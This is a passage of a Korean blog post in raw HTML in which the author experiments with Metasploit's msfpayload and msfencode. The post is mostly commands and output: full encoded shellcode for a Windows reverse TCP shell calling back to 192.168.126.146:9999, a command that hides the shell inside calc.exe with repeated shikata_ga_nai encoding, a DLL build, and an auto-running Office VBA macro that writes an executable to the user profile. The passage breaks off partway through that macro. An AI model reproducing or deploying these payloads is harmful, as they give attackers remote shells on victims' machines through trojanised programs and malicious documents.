&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;// &lt;/SPAN&gt;&lt;A href=&quot;http://www.metasploit.com/&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;http://www.metasploit.com&lt;/SPAN&gt;&lt;/A&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;// VERBOSE=false, LHOST=192.168.126.146, LPORT=9999, &lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;// ReverseConnectRetries=5, EXITFUNC=process, &lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;// InitialAutoRunScript=, AutoRunScript=&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050%u5040%u5040%uea68%udf0f%uffe0%u89d5%u68c7%ua8c0%u927e%u0268%u2700%u890f%u6ae6%u5610%u6857%ua599%u6174%ud5ff%u6368%u646d%u8900%u57e3%u5757%uf631%u126a%u5659%ufde2%uc766%u2444%u013c%u8d01%u2444%uc610%u4400%u5054%u5656%u4656%u4e56%u5656%u5653%u7968%u3fcc%uff86%u89d5%u4ee0%u4656%u30ff%u0868%u1d87%uff60%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff&lt;/SPAN&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;br /&gt;
&lt;br /&gt;JavaScript 형태는 인코딩하면 사이즈가 4배 정도 늘어납니다.&lt;br /&gt;
type이 js_le와 js_be가 있는데 차이가 없더군요..둘의 차이점은....좀 더 알아봐야 할 듯...-_-;;&lt;br /&gt;
&lt;br /&gt;
&lt;TABLE style=&quot;BORDER-COLLAPSE: collapse&quot; cellSpacing=1 cellPadding=1 width=700 bgColor=#ffffff&gt;
&lt;TBODY&gt;
&lt;TR&gt;
&lt;TD style=&quot;BORDER-BOTTOM: #dadada 1px solid; BORDER-LEFT: #dadada 1px solid; BORDER-TOP: #dadada 1px solid; BORDER-RIGHT: #dadada 1px solid&quot; width=&quot;100%&quot;&gt;
&lt;P&gt;&lt;A href=&quot;mailto:root@LUCKYSTRIKE&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;root@LUCKYSTRIKE&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 J | msfencode -t js_le&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;[*] x86/shikata_ga_nai succeeded with size 1183 (iteration=1)&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;%u7db8%u9a64%udb2b%ud9c1%u2474%u5ef4%uc929%ub966%u0121%u4631%u8316%u04c6%u4603%u9f12%ub591%u7f04%ua32d%u1b34%u44be%uccba%uc333%u7e59%u4cd8%u1bd0%u1656%u9066%u87f3%u35f2%u178c%u99d6%u695f%uf91c%uf0fd%u9c28%u0972%u71fe%u6555%uf974%u4fe5%u2e5b%uc771%u1ed4%u4210%u3f6f%ufc99%ud0e3%u8934%u4dd5%u1ca8%ube20%uff19%u8562%ubd37%u56c5%u7cfd%u39bc%u0d91%u9525%ube49%uaaed%u6ada%u05d3%ua0e4%u5405%ufd20%ua777%ucb7e%uf6a9%u054a%ud89a%u39fe%u4aad%u84ab%u5308%uce6a%u8346%u1f86%ue3b8%u3ac4%u86b0%ub79a%u0b59%u5634%ueecc%ud2a9%u9542%u6959%u300a%ub0d1%u96f9%u8e35%uaf59%u5661%u610f%u6bc9%u0fdf%uf0a2%u9c7a%udb4f%u68a4%u0c9f%u2585%u3bb1%udcb1%ud02c%u6b78%u47db%ue629%ucb4d%u7aae%u9bfb%u4744%u7bd7%uc2e4%u1353%u59b4%ub8f2%ud35b%u4f63%u2ee8%u8a7e%u3565%ub246%u90e6%u0ac3%ue2d9%u4e12%u226c%ua055%u67be%uf8e0%u5187%udc3a%uae82%u7b0b%uf558%ub51e%u9196%u9cd2%u6ca3%ue721%uab29%u2f30%u80cc%u6a8a%ud665%u4189%u33b7%u9f3b%u0385%ufaa1%u4b9c%u3447%u8e6b%u04f2%ue7ab%u4dce%u65be%ube18%u4c26%u8c13%uba90%ud5ba%ua4a9%u255a%u0d63%u2ad6%u7eb3%u8829%ub3c6%ub32a%u964b%u04d9%ueeef%u4e10%u3c9a%ua030%u6556%ua3c3%u57a7%u011b%ua7bd%u2a3f%ue25b%ucfca%udc94%u3505%u7aae%u5056%ua762%uafe3%u92b5%uf539%ue9cc%ucd0f%u344c%u1505%u07f3%u40d5%u5486%ubf76%ubf5a%udb0d%u8faa%u06dc%udbbe%u712e%u0622%ub93a%u7f97%u9cfc%u48a2%ubdc8%u937c%u7245%uef4c%u57c4%u3adb%ufc37%u6113%uc842%u516b%u15ce%u99f9%u676c%ufc39%ub505%ucb09%u9cdd%u571c%uef2d%ub2ef%u3c24%ud973%u67f5%u1906%u5398%u7cd1%ua429%u4d43%uf1e5%ud5f6%uca33%u30c9%u4c49%u094c%ub580%u0ee5%u86d2%uf534%u8a67%u9407%u69e4%u661d%u128f%ua3bb%ub63a%u9b74%u1df5%ube0e%u6ec5%u65c8%uf753%u521c%ud2ae%uab29%u2cb4%uf6e1%u7e41%u9e67%ua591%u6c12%u92d6%ub5b8%ub863%u8272%u67be%ud406%u52a2%u01d0%uaf56%u7c14%ueaa0%u1a21%uc4e3%uc7f8%u1d76%u3199%u784f%u0928%ub2cd%u54b1%u8664%uae0d%ucde4%ufe18%u3cd9%udb80%u076c%u4724%u52bc%ubfdd%uaca0%u9a29%ua951%ud461%u14a8%u20f7%u6eff%u6dce%ubc8a%u5f04%ue440%uaa11%ud3ca%uf1bb%u297f%ucf05%u744e%u1a00%u4380%u418b%uce97%uef7b%u3431%uda09%u03db%u01c9%u5451%u7c4b%u81f8%u1bfe%uf898%uc632%uce29%u3056%u15e4%u73e2%u603b%u5634%ubc4e%uab74%u9982%ufd01%ud1da%u24d9%u256e%u1129%u6ca7%u6838%u5da1%ub7f0%u9458%u82cc%ufd96%udb59%uc9e1%u06c2%u027b%u7a32%u47b5%u1e49%ue18c%ufbd7%ud49b%u6127%u025c%u553d%u7cac%ub08c%u4eb9%u8ad7%u8a71%udf52%ub745%u3aa8%u01d3%u71e9%u4b2b%u417c%ua17b%u9447%uf50e%ue087%ud092%u6892%u7d66%u553b%ub4fd%ua0f3%u93cd%uff86%ue91d%uda58%u2428%u10a9%u63e3%u6dbc%u5833%ua80e%uc546%u840f%u2090%u8ca5%u1a86%u6923%u3d32%u14cd%ue48c%uee64%u82d5%u2bb3%u7d53%u5084%ua4ac%uf781%uc5ea%ud259%u337f%u2ba8%u66e5%u63b9%u5ed7%ua679%uad62%u984e%uf4bc%ue0c5%uc685%u3543%u1083%u50ed%u785d%uaf98%ub397%uea52%u85a2%uc1aa%ucf7b%u48bf%u36b1%uaf79%u7ecc%u9848%u5a1a%u82df%uc257%u6f79%u3ced%u59b5%u6435%u93cc%u5071%ufe4a%ua40c%u30ab%uf1df%u05be%u9f28%u4073%u6a23%ubf43%ub1fc%ud9de%u8934%u0011%udc4c%u7c63%u3bcf%ub5f1%u7139%u90c0%u1f30%ubf56%ufa88%u5ce3%u32da%u873a%u0951%uf376%u48ad%ucb03%ua1fc%u0e88%ufd8a%u602a%udb45%ub2c7%u1791%u971c%u34ac%ue66a%u9e7e%u3ce7%ud04b%u1937%u25c6%u5408%u631c%ua31d%u5e6a%ueeeb%u94e7%uc525%uf031%u113c%ucf5b%u7c88%u1ad6%u4bc3%u402e%u865e%ubf78%ucd93%u88f1%u3bea%ud3c2%u7079%u7f54%u53e1%u19ed%ua383%uc33b%ueb3e%u6f7a%u2ef4%u5b08%u5593%u86c2%ua12e%ufc14%uece6%ucd2d%u8836%u14ab%u6442%u610c%ua194%ubc19%u9180%u9bd6%u873d%ud27e%u628d%u780a%u088c%u59c1%ub225%uc41c%u17f5%u3d2a%u36c0%u18e6%ud959%u5530%u3c99%ufb48%u07bd%ude87%u1148%u1981%uf8d7%u6938%u6674%ua8f6%u510f%u829b%ub8d9%udb2e%uf215%u3eb1%u9723%u2701%u72a9%u9717%u4b18%uf2e2%u8717%u9f3b%uc2b5%u6836%u3d08%ub38a%u0b19%u8d8d%u5687%uc738%ua874%u02f2%uac0e%u2ac7%u4196&lt;/SPAN&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;TABLE style=&quot;BORDER-COLLAPSE: collapse&quot; cellSpacing=1 cellPadding=1 width=700 bgColor=#ffffff&gt;
&lt;TBODY&gt;
&lt;TR&gt;
&lt;TD style=&quot;BORDER-BOTTOM: #dadada 1px solid; BORDER-LEFT: #dadada 1px solid; BORDER-TOP: #dadada 1px solid; BORDER-RIGHT: #dadada 1px solid&quot; width=&quot;100%&quot;&gt;&lt;A href=&quot;mailto:root@LUCKYSTRIKE&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;root@LUCKYSTRIKE&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 &lt;/SPAN&gt;&lt;FONT color=#e31600&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;X&lt;/SPAN&gt;&lt;/FONT&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt; | msfencode -o reverse_shell&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;Created by msfpayload (&lt;/SPAN&gt;&lt;A href=&quot;http://www.metasploit.com/&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;http://www.metasploit.com&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;).&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;Payload: windows/shell_reverse_tcp&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;Length: 314&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;Options: {&quot;LHOST&quot;=&amp;gt;&quot;192.168.126.146&quot;, &quot;LPORT&quot;=&amp;gt;&quot;9999&quot;}&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;[*] x86/shikata_ga_nai succeeded with size 73831 (iteration=1)&lt;/SPAN&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;br /&gt;
&lt;br /&gt;type을 exe 형태로 지정해서 파일로 떨궈볼려고 했는데 안되더군요..너무 작다는 메시지만 계속 뿌립니다.&lt;br /&gt;
&lt;br /&gt;
&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://cfile2.uf.tistory.com/original/206BC13D4F0E6C05166E5B&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile2.uf.tistory.com/image/206BC13D4F0E6C05166E5B&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;msfpayload_X1.png&quot; height=&quot;678&quot; width=&quot;710&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;/P&gt;&lt;br /&gt;
&lt;br /&gt;&lt;STRIKE&gt;인코딩을 하지 않으면 PE 포맷 형태로 나오긴 합니다만...뭔가 다른 방법이 있을듯 합니다.&lt;br /&gt;
(일단 포스팅하고 삽질을 좀 더 해봐야할 듯...)&lt;br /&gt;
&lt;/STRIKE&gt;&lt;br /&gt;

&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://cfile22.uf.tistory.com/original/2038EF3D4F0E6C17314644&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile22.uf.tistory.com/image/2038EF3D4F0E6C17314644&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;msfpayload_X2.png&quot; height=&quot;678&quot; width=&quot;710&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;/P&gt;&lt;br /&gt;
&lt;br /&gt;위 문제점은 아래 방법으로 해결했습니다. 히히&lt;br /&gt;
&lt;br /&gt;
&lt;TABLE style=&quot;BORDER-COLLAPSE: collapse&quot; cellSpacing=1 cellPadding=1 width=700 bgColor=#ffffff&gt;
&lt;TBODY&gt;
&lt;TR&gt;
&lt;TD style=&quot;BORDER-BOTTOM: #dadada 1px solid; BORDER-LEFT: #dadada 1px solid; BORDER-TOP: #dadada 1px solid; BORDER-RIGHT: #dadada 1px solid&quot; width=&quot;100%&quot;&gt;
&lt;P&gt;&lt;A href=&quot;mailto:root@LUCKYSTRIKE&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;root@LUCKYSTRIKE&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999&amp;nbsp;&lt;/SPAN&gt;&lt;FONT color=#e31600&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;X&lt;/SPAN&gt;&lt;/FONT&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt; | msfencode -t exe -x calc.exe -k -o reverse_shell.exe -e x86/shikata_ga_nai -c 5&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)&lt;/SPAN&gt;&lt;br /&gt;
&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;br /&gt;
&lt;A href=&quot;http://carnal0wnage.attackresearch.com/2010/03/msfencode-msfpayload-into-existing.html&quot;&gt;&lt;A title=&quot;[http://carnal0wnage.attackresearch.com/2010/03/msfencode-msfpayload-into-existing.html]로 이동합니다.&quot; href=&quot;http://carnal0wnage.attackresearch.com/2010/03/msfencode-msfpayload-into-existing.html&quot; target=_blank&gt;http://carnal0wnage.attackresearch.com/2010/03/msfencode-msfpayload-into-existing.html&lt;/A&gt;&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;-x 옵션은 지정된 템플릿을 바탕으로 실행 파일을 만들게끔 해줍니다. -k 옵션과 함께 사용해야 하며&lt;br /&gt;
-x 옵션 뒤에 디렉토리를 따로 지정하지 않으면 metasploit 설치 디렉토리 하위에 data/templates에 지정한 파일(calc.exe)가 있어야 합니다.&lt;br /&gt;
&lt;br /&gt;참고했던 위 페이지에서 처럼 실행해봤더니 잘 실행됨을 확인할 수 있었습니다. ㅎㅎ&lt;br /&gt;
&lt;br /&gt;
&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://cfile4.uf.tistory.com/original/14032E4D4F0E7EC10D660B&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile4.uf.tistory.com/image/14032E4D4F0E7EC10D660B&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;reverse_shell.png&quot; height=&quot;519&quot; width=&quot;710&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;/P&gt;&lt;br /&gt;
&lt;br /&gt;msfencode에 대한 더 많은 삽질이 필요할 듯 합니다.&lt;br /&gt;
좀 더 알게되면 추가 포스팅해야겠습니다.&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;

&lt;TABLE style=&quot;BORDER-COLLAPSE: collapse&quot; cellSpacing=1 cellPadding=1 width=700 bgColor=#ffffff&gt;
&lt;TBODY&gt;
&lt;TR&gt;
&lt;TD style=&quot;BORDER-BOTTOM: #dadada 1px solid; BORDER-LEFT: #dadada 1px solid; BORDER-TOP: #dadada 1px solid; BORDER-RIGHT: #dadada 1px solid&quot; width=&quot;100%&quot;&gt;&lt;A href=&quot;mailto:root@LUCKYSTRIKE&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;root@LUCKYSTRIKE&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 &lt;/SPAN&gt;&lt;FONT color=#e31600&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;D&lt;/SPAN&gt;&lt;/FONT&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt; | msfencode -o reverse_shell.dll -t dll&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;Created by msfpayload (&lt;/SPAN&gt;&lt;A href=&quot;http://www.metasploit.com/&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;http://www.metasploit.com&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;).&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;Payload: windows/shell_reverse_tcp&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;Length: 314&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;Options: {&quot;LHOST&quot;=&amp;gt;&quot;192.168.126.146&quot;, &quot;LPORT&quot;=&amp;gt;&quot;9999&quot;}&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;[*] x86/shikata_ga_nai succeeded with size 14365 (iteration=1)&lt;/SPAN&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;TABLE style=&quot;BORDER-COLLAPSE: collapse&quot; cellSpacing=1 cellPadding=1 width=700 bgColor=#ffffff&gt;
&lt;TBODY&gt;
&lt;TR&gt;
&lt;TD style=&quot;BORDER-BOTTOM: #dadada 1px solid; BORDER-LEFT: #dadada 1px solid; BORDER-TOP: #dadada 1px solid; BORDER-RIGHT: #dadada 1px solid&quot; width=&quot;100%&quot;&gt;
&lt;P&gt;&lt;A href=&quot;mailto:root@LUCKYSTRIKE&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;root@LUCKYSTRIKE&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 &lt;/SPAN&gt;&lt;FONT color=#e31600&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;V&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;amp;H00&amp;amp;...(snip)...H00&amp;amp;&lt;br /&gt;
'Created by msfpayload (&lt;/SPAN&gt;&lt;A href=&quot;http://www.metasploit.com/&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;http://www.metasploit.com&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;).&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;'Payload: windows/shell_reverse_tcp&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;' Length: 314&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;'Options: {&quot;LHOST&quot;=&amp;gt;&quot;192.168.126.146&quot;, &quot;LPORT&quot;=&amp;gt;&quot;9999&quot;}&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;'**************************************************************&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;'*&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;'* This code is now split into two pieces:&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;'*&amp;nbsp; 1. The Macro. This must be copied into the Office document&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;'*&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; macro editor. This macro will run on startup.&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;'*&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;'*&amp;nbsp; 2. The Data. The hex dump at the end of this output must be&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;'*&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; appended to the end of the document contents.&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;'*&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;'**************************************************************&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;'*&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;'* MACRO CODE&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;'*&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;'**************************************************************&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;Sub Auto_Open()&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;Bntml12&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;End Sub&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;Sub Bntml12()&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;Dim Bntml7 As Integer&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;Dim Bntml1 As String&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;Dim Bntml2 As String&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;Dim Bntml3 As Integer&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;Dim Bntml4 As Paragraph&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;Dim Bntml8 As Integer&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;Dim Bntml9 As Boolean&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;Dim Bntml5 As Integer&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;Dim Bntml11 As String&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;Dim Bntml6 As Byte&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;Dim Ilbpdhngga as String&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;Ilbpdhngga = &quot;Ilbpdhngga&quot;&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;Bntml1 = &quot;qGPLaRGNNbzhDLG.exe&quot;&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;Bntml2 = Environ(&quot;USERPROFILE&quot;)&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;ChDrive (Bntml2)&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;ChDir (Bntml2)&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;Bntml3 = FreeFile()&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;Open Bntml1 For Binary As Bntml3&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;For Each Bntml4 in ActiveDocument.Paragraphs&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;DoEvents&lt;/SPAN&gt;&lt;br /&gt;
